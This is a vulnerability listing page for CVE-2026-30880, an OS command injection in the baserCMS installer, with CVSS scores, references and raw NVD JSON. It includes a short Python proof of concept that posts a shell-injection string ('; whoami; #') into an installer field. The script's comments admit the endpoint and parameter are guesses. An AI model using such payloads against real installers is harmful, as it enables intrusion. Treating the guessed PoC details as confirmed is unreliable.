CVE-2026-30880

Description

baserCMS is a website development framework. Prior to version 5.2.3, baserCMS has an OS command injection vulnerability in the installer. This issue has been patched in version 5.2.3.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:basercms:basercms:*:*:*:*:*:*:*:* - VULNERABLE

baserCMS < 5.2.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL of the baserCMS installer
# The specific vulnerable endpoint might vary, typically /install or /installation
target_url = "http://<target_ip>/install/index.php"

# Malicious payload to inject OS command (e.g., 'whoami')
# The injection point depends on the vulnerable parameter
payload = "; whoami; #"

data = {
    # Hypothetical parameter based on typical installer behavior
    "data[Installation][db_host]": payload,
    "next": "Next"
}

try:
    response = requests.post(target_url, data=data)
    if response.status_code == 200:
        print("Payload sent successfully.")
        print("Check the response for command execution output.")
        print(response.text[:500]) # Print partial response
    else:
        print(f"Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-30880
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-30880
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-30880/
[4] VulDB https://vuldb.com/cve/CVE-2026-30880
[5] https://basercms.net/security/JVN_20837860
[6] https://github.com/baserproject/basercms/releases/tag/5.2.3
[7] https://github.com/baserproject/basercms/security/advisories/GHSA-6hpg-8rx3-cwgv

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-30880", "sourceIdentifier": "[email protected]", "published": "2026-03-31T01:16:36.270", "lastModified": "2026-04-01T20:27:00.497", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "baserCMS is a website development framework. Prior to version 5.2.3, baserCMS has an OS command injection vulnerability in the installer. This issue has been patched in version 5.2.3."}, {"lang": "es", "value": "baserCMS es un framework de desarrollo de sitios web. Antes de la versión 5.2.3, baserCMS tiene una vulnerabilidad de inyección de comandos del sistema operativo en el instalador. Este problema ha sido parcheado en la versión 5.2.3."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.2, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:basercms:basercms:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.2.3", "matchCriteriaId": "07DEEEF3-0621-431D-8A38-405EDBD0957E"}]}]}], "references": [{"url": "https://basercms.net/security/JVN_20837860", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/baserproject/basercms/releases/tag/5.2.3", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/baserproject/basercms/security/advisories/GHSA-6hpg-8rx3-cwgv", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}